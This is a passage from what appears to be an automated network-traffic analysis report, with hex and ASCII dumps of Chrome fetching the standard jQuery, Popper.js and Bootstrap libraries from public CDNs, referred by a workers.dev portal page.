                                                                      Data Ascii: urn o===t}),n=!!i&&e.some(function(e){return e.name===o&&e.enabled&&e.order<i.order});if(!n){var r='`'+t+'`';console.warn('`'+o+'`'+' modifier is required by '+r+' modifier in order to work, be sure to include it before '+r+'!')}return n}function K(e){ret
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 75 72 6e 27 27 3d 3d 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 26 26 2d 31 21 3d 3d 5b 27 2b 27 2c 27 2d 27 5d 2e 69 6e 64 65 78 4f 66 28 74 29 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3d 74 2c 70 3d 21 30 2c 65 29 3a 70 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 2b 3d 74 2c 70 3d 21 31 2c 65 29 3a 65 2e 63 6f 6e 63 61 74 28 74 29 7d 2c 5b 5d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 56 28 65 2c 6e 2c 74 2c 6f 29 7d 29 7d 29 2c 61 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 69 29 7b 55 28 6f 29 26 26 28 6e 5b 74 5d 2b 3d 6f 2a 28 27 2d 27 3d 3d 3d 65 5b 69 2d 31 5d 3f 2d 31 3a 31 29 29 7d 29 7d 29 2c 6e 7d 66 75 6e 63 74 69 6f 6e
                                                                      Data Ascii: urn''===e[e.length-1]&&-1!==['+','-'].indexOf(t)?(e[e.length-1]=t,p=!0,e):p?(e[e.length-1]+=t,p=!1,e):e.concat(t)},[]).map(function(e){return V(e,n,t,o)})}),a.forEach(function(e,t){e.forEach(function(o,i){U(o)&&(n[t]+=o*('-'===e[i-1]?-1:1))})}),n}function
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 75 72 6e 20 6f 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 29 2c 69 26 26 65 28 74 2c 69 29 2c 74 7d 7d 28 29 2c 70 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6f 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6f 2c 65 7d 2c 73 65 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 3d 61 72 67 75 6d 65 6e 74 73 5b 6f
                                                                      Data Ascii: urn o&&e(t.prototype,o),i&&e(t,i),t}}(),pe=function(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurable:!0,writable:!0}):e[t]=o,e},se=Object.assign||function(e){for(var t,o=1;o<arguments.length;o++)for(var i in t=arguments[o


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.449739151.101.66.1374434228C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-03-28 23:21:04 UTC631OUTGET /jquery-3.1.1.min.js HTTP/1.1
                                                                      Host: code.jquery.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      sec-ch-ua-mobile: ?0
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: cross-site
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: script
                                                                      Referer: https://portal.bakfar.workers.dev/
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2024-03-28 23:21:04 UTC569INHTTP/1.1 200 OK
                                                                      Connection: close
                                                                      Content-Length: 86709
                                                                      Server: nginx
                                                                      Content-Type: application/javascript; charset=utf-8
                                                                      Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                      ETag: "28feccc0-152b5"
                                                                      Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                      Access-Control-Allow-Origin: *
                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                      Accept-Ranges: bytes
                                                                      Date: Thu, 28 Mar 2024 23:21:04 GMT
                                                                      Age: 1436129
                                                                      X-Served-By: cache-lga21947-LGA, cache-iad-kcgs7200072-IAD
                                                                      X-Cache: HIT, HIT
                                                                      X-Cache-Hits: 2976, 2
                                                                      X-Timer: S1711668064.183080,VS0,VE0
                                                                      Vary: Accept-Encoding
                                                                      2024-03-28 23:21:04 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 31 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77
                                                                      Data Ascii: /*! jQuery v3.1.1 | (c) jQuery Foundation | jquery.org/license */!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window w
                                                                      2024-03-28 23:21:04 UTC1378INData Raw: 3e 3d 30 26 26 63 3c 62 3f 5b 74 68 69 73 5b 63 5d 5d 3a 5b 5d 29 7d 2c 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 7c 7c 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7d 2c 70 75 73 68 3a 68 2c 73 6f 72 74 3a 63 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 63 2e 73 70 6c 69 63 65 7d 2c 72 2e 65 78 74 65 6e 64 3d 72 2e 66 6e 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 68 3d 31 2c 69 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6a 3d 21 31 3b 66 6f 72 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 67 26 26 28 6a 3d 67 2c 67 3d 61 72 67 75 6d 65 6e 74 73
                                                                      Data Ascii: >=0&&c<b?[this[c]]:[])},end:function(){return this.prevObject||this.constructor()},push:h,sort:c.sort,splice:c.splice},r.extend=r.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments
                                                                      2024-03-28 23:21:04 UTC1378INData Raw: 6e 20 61 2e 6e 6f 64 65 4e 61 6d 65 26 26 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 3d 30 3b 69 66 28 77 28 61 29 29 7b 66 6f 72 28 63 3d 61 2e 6c 65 6e 67 74 68 3b 64 3c 63 3b 64 2b 2b 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 7d 65 6c 73 65 20 66 6f 72 28 64 20 69 6e 20 61 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 61 7d 2c 74 72 69 6d 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 22 22 3a 28 61 2b 22 22 29 2e
                                                                      Data Ascii: n a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b){var c,d=0;if(w(a)){for(c=a.length;d<c;d++)if(b.call(a[d],d,a[d])===!1)break}else for(d in a)if(b.call(a[d],d,a[d])===!1)break;return a},trim:function(a){return null==a?"":(a+"").
                                                                      2024-03-28 23:21:04 UTC1378INData Raw: 61 72 72 61 79 22 3d 3d 3d 63 7c 7c 30 3d 3d 3d 62 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 62 26 26 62 3e 30 26 26 62 2d 31 20 69 6e 20 61 29 7d 76 61 72 20 78 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 70 2c 71 2c 72 2c 73 2c 74 2c 75 3d 22 73 69 7a 7a 6c 65 22 2b 31 2a 6e 65 77 20 44 61 74 65 2c 76 3d 61 2e 64 6f 63 75 6d 65 6e 74 2c 77 3d 30 2c 78 3d 30 2c 79 3d 68 61 28 29 2c 7a 3d 68 61 28 29 2c 41 3d 68 61 28 29 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 26 26 28 6c 3d 21 30 29 2c 30 7d 2c 43 3d 7b 7d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 44 3d 5b 5d 2c 45 3d 44 2e 70 6f 70 2c 46 3d 44 2e
                                                                      Data Ascii: array"===c||0===b||"number"==typeof b&&b>0&&b-1 in a)}var x=function(a){var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u="sizzle"+1*new Date,v=a.document,w=0,x=0,y=ha(),z=ha(),A=ha(),B=function(a,b){return a===b&&(l=!0),0},C={}.hasOwnProperty,D=[],E=D.pop,F=D.
                                                                      2024-03-28 23:21:04 UTC1378INData Raw: 70 28 22 5e 22 2b 4b 2b 22 2a 5b 3e 2b 7e 5d 7c 3a 28 65 76 65 6e 7c 6f 64 64 7c 65 71 7c 67 74 7c 6c 74 7c 6e 74 68 7c 66 69 72 73 74 7c 6c 61 73 74 29 28 3f 3a 5c 5c 28 22 2b 4b 2b 22 2a 28 28 3f 3a 2d 5c 5c 64 29 3f 5c 5c 64 2a 29 22 2b 4b 2b 22 2a 5c 5c 29 7c 29 28 3f 3d 5b 5e 2d 5d 7c 24 29 22 2c 22 69 22 29 7d 2c 57 3d 2f 5e 28 3f 3a 69 6e 70 75 74 7c 73 65 6c 65 63 74 7c 74 65 78 74 61 72 65 61 7c 62 75 74 74 6f 6e 29 24 2f 69 2c 58 3d 2f 5e 68 5c 64 24 2f 69 2c 59 3d 2f 5e 5b 5e 7b 5d 2b 5c 7b 5c 73 2a 5c 5b 6e 61 74 69 76 65 20 5c 77 2f 2c 5a 3d 2f 5e 28 3f 3a 23 28 5b 5c 77 2d 5d 2b 29 7c 28 5c 77 2b 29 7c 5c 2e 28 5b 5c 77 2d 5d 2b 29 29 24 2f 2c 24 3d 2f 5b 2b 7e 5d 2f 2c 5f 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 28 5b 5c 5c 64 61
                                                                      Data Ascii: p("^"+K+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+K+"*((?:-\\d)?\\d*)"+K+"*\\)|)(?=[^-]|$)","i")},W=/^(?:input|select|textarea|button)$/i,X=/^h\d$/i,Y=/^[^{]+\{\s*\[native \w/,Z=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,$=/[+~]/,_=new RegExp("\\\\([\\da
                                                                      2024-03-28 23:21:04 UTC1378INData Raw: 5b 33 5d 29 26 26 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 26 26 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 29 72 65 74 75 72 6e 20 47 2e 61 70 70 6c 79 28 64 2c 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 66 29 29 2c 64 7d 69 66 28 63 2e 71 73 61 26 26 21 41 5b 61 2b 22 20 22 5d 26 26 28 21 71 7c 7c 21 71 2e 74 65 73 74 28 61 29 29 29 7b 69 66 28 31 21 3d 3d 77 29 73 3d 62 2c 72 3d 61 3b 65 6c 73 65 20 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7b 28 6b 3d 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 6b 3d 6b 2e 72 65 70 6c 61 63 65 28 62 61 2c 63 61 29 3a 62 2e 73 65 74
                                                                      Data Ascii: [3])&&c.getElementsByClassName&&b.getElementsByClassName)return G.apply(d,b.getElementsByClassName(f)),d}if(c.qsa&&!A[a+" "]&&(!q||!q.test(a))){if(1!==w)s=b,r=a;else if("object"!==b.nodeName.toLowerCase()){(k=b.getAttribute("id"))?k=k.replace(ba,ca):b.set
                                                                      2024-03-28 23:21:04 UTC1378INData Raw: 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 62 2e 69 73 44 69 73 61 62 6c 65 64 3d 3d 3d 61 7c 7c 62 2e 69 73 44 69 73 61 62 6c 65 64 21 3d 3d 21 61 26 26 65 61 28 62 29 3d 3d 3d 61 3a 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 22 6c 61 62 65 6c 22 69 6e 20 62 26 26 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 61 28 61 29 7b 72 65 74 75 72 6e 20 69 61 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 3d 2b 62 2c 69 61 28 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 76 61 72 20 65 2c 66 3d 61 28 5b 5d 2c 63 2e 6c 65 6e 67 74 68 2c 62 29 2c 67 3d 66 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 67 2d 2d 29 63 5b 65 3d 66 5b 67 5d 5d 26 26 28 63 5b 65 5d 3d 21 28 64 5b 65
                                                                      Data Ascii: e.disabled===a:b.disabled===a:b.isDisabled===a||b.isDisabled!==!a&&ea(b)===a:b.disabled===a:"label"in b&&b.disabled===a}}function pa(a){return ia(function(b){return b=+b,ia(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e
                                                                      2024-03-28 23:21:04 UTC1378INData Raw: 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 63 26 26 63 2e 76 61 6c 75 65 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 2c 64 2c 65 2c 66 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 3b 69 66 28 66 29 7b 69 66 28 63 3d 66 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 2c 63 26 26 63 2e 76 61 6c 75 65
                                                                      Data Ascii: n function(a){var c="undefined"!=typeof a.getAttributeNode&&a.getAttributeNode("id");return c&&c.value===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c,d,e,f=b.getElementById(a);if(f){if(c=f.getAttributeNode("id"),c&&c.value
                                                                      2024-03-28 23:21:04 UTC1378INData Raw: 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 2f 61 3e 3c 73 65 6c 65 63 74 20 64 69 73 61 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 6f 70 74 69 6f 6e 2f 3e 3c 2f 73 65 6c 65 63 74 3e 22 3b 76 61 72 20 62 3d 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 3b 62 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 71 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4b 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 32 21 3d 3d 61 2e 71 75 65 72 79 53
                                                                      Data Ascii: bled='disabled'></a><select disabled='disabled'><option/></select>";var b=n.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+K+"*[*^$|!~]?="),2!==a.queryS
                                                                      2024-03-28 23:21:04 UTC1378INData Raw: 44 6f 63 75 6d 65 6e 74 3d 3d 3d 76 26 26 74 28 76 2c 62 29 3f 31 3a 6b 3f 49 28 6b 2c 61 29 2d 49 28 6b 2c 62 29 3a 30 3a 34 26 64 3f 2d 31 3a 31 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 63 2c 64 3d 30 2c 65 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 66 3d 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 67 3d 5b 61 5d 2c 68 3d 5b 62 5d 3b 69 66 28 21 65 7c 7c 21 66 29 72 65 74 75 72 6e 20 61 3d 3d 3d 6e 3f 2d 31 3a 62 3d 3d 3d 6e 3f 31 3a 65 3f 2d 31 3a 66 3f 31 3a 6b 3f 49 28 6b 2c 61 29 2d 49 28 6b 2c 62 29 3a 30 3b 69 66 28 65 3d 3d 3d 66 29 72 65 74 75 72 6e 20 6c 61 28 61 2c 62 29 3b 63 3d 61 3b 77 68 69 6c 65 28 63 3d 63 2e 70 61 72 65 6e 74 4e 6f 64 65 29 67 2e 75 6e
                                                                      Data Ascii: Document===v&&t(v,b)?1:k?I(k,a)-I(k,b):0:4&d?-1:1)}:function(a,b){if(a===b)return l=!0,0;var c,d=0,e=a.parentNode,f=b.parentNode,g=[a],h=[b];if(!e||!f)return a===n?-1:b===n?1:e?-1:f?1:k?I(k,a)-I(k,b):0;if(e===f)return la(a,b);c=a;while(c=c.parentNode)g.un


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.449750104.18.10.2074434228C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-03-28 23:21:04 UTC658OUTGET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1
                                                                      Host: stackpath.bootstrapcdn.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      sec-ch-ua-mobile: ?0
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: cross-site
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: script
                                                                      Referer: https://portal.bakfar.workers.dev/
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2024-03-28 23:21:04 UTC946INHTTP/1.1 200 OK
                                                                      Date: Thu, 28 Mar 2024 23:21:04 GMT
                                                                      Content-Type: application/javascript; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      CDN-PullZone: 252412
                                                                      CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                      CDN-RequestCountryCode: DE
                                                                      Access-Control-Allow-Origin: *
                                                                      Cache-Control: public, max-age=31919000
                                                                      ETag: W/"67176c242e1bdc20603c878dee836df3"
                                                                      Last-Modified: Mon, 25 Jan 2021 22:04:06 GMT
                                                                      CDN-CachedAt: 10/31/2023 18:58:40
                                                                      CDN-ProxyVer: 1.04
                                                                      CDN-RequestPullCode: 200
                                                                      CDN-RequestPullSuccess: True
                                                                      CDN-EdgeStorageId: 1048
                                                                      timing-allow-origin: *
                                                                      cross-origin-resource-policy: cross-origin
                                                                      X-Content-Type-Options: nosniff
                                                                      CDN-Status: 200
                                                                      CDN-RequestId: f4f838df79fc133911a060d7c6bb0f5c
                                                                      CDN-Cache: HIT
                                                                      CF-Cache-Status: HIT
                                                                      Age: 874594
                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                      Server: cloudflare
                                                                      CF-RAY: 86bb5ab9681c3b00-IAD
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2024-03-28 23:21:04 UTC423INData Raw: 37 63 30 32 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 31 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28
                                                                      Data Ascii: 7c02/*! * Bootstrap v4.1.3 (https://getbootstrap.com/) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 68 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 69 2e 6b 65 79 2c 69
                                                                      Data Ascii: ery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 6e 2c 55 6e 2c 71 6e 2c 46 6e 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 65 3d 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 6e 3d 21 31 3b 72 65 74 75 72 6e 20 69 28 74 68 69 73 29 2e 6f 6e 65 28 6c 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 3d 21 30 7d 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 7c 7c 6c 2e 74 72 69 67 67 65 72 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 65 29 7d 2c 74 29 2c 74 68 69 73 7d 76 61 72 20 6c 3d 7b 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 3a 22 62 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 67 65 74 55 49 44 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 3b 74 2b
                                                                      Data Ascii: n,Un,qn,Fn=function(i){var e="transitionend";function t(t){var e=this,n=!1;return i(this).one(l.TRANSITION_END,function(){n=!0}),setTimeout(function(){n||l.triggerTransitionEnd(e)},t),this}var l={TRANSITION_END:"bsTransitionEnd",getUID:function(t){for(;t+
                                                                      2024-03-28 23:21:04 UTC1369INData Raw: 67 75 6d 65 6e 74 73 29 7d 7d 2c 6c 7d 28 65 29 2c 4b 6e 3d 28 6e 3d 22 61 6c 65 72 74 22 2c 61 3d 22 2e 22 2b 28 6f 3d 22 62 73 2e 61 6c 65 72 74 22 29 2c 63 3d 28 72 3d 65 29 2e 66 6e 5b 6e 5d 2c 75 3d 7b 43 4c 4f 53 45 3a 22 63 6c 6f 73 65 22 2b 61 2c 43 4c 4f 53 45 44 3a 22 63 6c 6f 73 65 64 22 2b 61 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 61 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 66 3d 22 61 6c 65 72 74 22 2c 64 3d 22 66 61 64 65 22 2c 67 3d 22 73 68 6f 77 22 2c 5f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 74 7d 76 61 72 20 74 3d 69 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 63 6c 6f 73 65 3d 66 75 6e 63 74 69 6f 6e 28 74
